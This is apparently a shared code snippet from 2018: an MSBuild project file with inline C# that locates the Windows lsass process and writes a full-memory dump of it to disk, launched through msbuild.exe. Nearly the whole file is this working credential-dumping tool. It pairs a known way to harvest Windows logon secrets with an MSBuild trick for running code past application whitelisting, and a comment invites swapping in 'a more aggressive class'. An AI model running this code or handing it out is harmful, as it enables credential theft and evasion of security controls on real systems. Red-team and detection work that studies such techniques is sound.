moriarty
3/1/2018 - 8:13 AM

MSBuild - Process Dumper - lsass example

MSBuild - Process Dumper - lsass example

MSBuildProcDumper.csproj
content_copyfile_download
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
  <!-- Feel free to use a more aggressive class for testing. -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<!-- <Reference Include="System.IO" /> Example Include -->		
      <Code Type="Class" Language="cs">
        <![CDATA[
			
			using System;
			using System.IO;
			using System.Diagnostics;
			using System.Runtime.InteropServices;
			using System.Security;
			
			using System.Reflection;
			using System.Runtime.Remoting;
			using System.Threading;
			using System.Globalization;
			
			using Microsoft.Build.Framework;
			using Microsoft.Build.Utilities;
				
			public class ClassExample :  Task, ITask
			{
				public override bool Execute()
				{
					Console.WriteLine("Hello From MSBuildProcDump!");
					CreateMiniDump();
					return true;
				}
				
				public static class MINIDUMPTYPE
				{
					public const int MiniDumpNormal = 0x00000000;
					public const int MiniDumpWithDataSegs = 0x00000001;
					public const int MiniDumpWithFullMemory = 0x00000002;
					public const int MiniDumpWithHandleData = 0x00000004;
					public const int MiniDumpFilterMemory = 0x00000008;
					public const int MiniDumpScanMemory = 0x00000010;
					public const int MiniDumpWithUnloadedModules = 0x00000020;
					public const int MiniDumpWithIndirectlyReferencedMemory = 0x00000040;
					public const int MiniDumpFilterModulePaths = 0x00000080;
					public const int MiniDumpWithProcessThreadData = 0x00000100;
					public const int MiniDumpWithPrivateReadWriteMemory = 0x00000200;
					public const int MiniDumpWithoutOptionalData = 0x00000400;
					public const int MiniDumpWithFullMemoryInfo = 0x00000800;
					public const int MiniDumpWithThreadInfo = 0x00001000;
					public const int MiniDumpWithCodeSegs = 0x00002000;
				}

				[DllImport("dbghelp.dll")]
				public static extern bool MiniDumpWriteDump(
					IntPtr hProcess, Int32 ProcessId, IntPtr hFile, int DumpType,
					IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallackParam);

				private static void CurrentDomainUnhandledException(
					object sender, UnhandledExceptionEventArgs e)
				{
					CreateMiniDump();
				}

				public static void CreateMiniDump()
				{

					DateTime endTime = DateTime.Now;
					string dt = endTime.ToString("yyyy.MM.dd.HH.mm.ss", DateTimeFormatInfo.InvariantInfo);
					
					string dumpFileName = "Dump" + dt +".dmp";
					FileStream fs = new FileStream(dumpFileName, FileMode.Create);
					
					Process[] plist = Process.GetProcessesByName("lsass");
					Process process = plist[0];
					Console.WriteLine(process.Id); 
					MiniDumpWriteDump(
						process.Handle, process.Id, 
						fs.SafeFileHandle.DangerousGetHandle(),
						MINIDUMPTYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
					
				
				}
				
				
				
				
				
				
			}
			
		
			
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>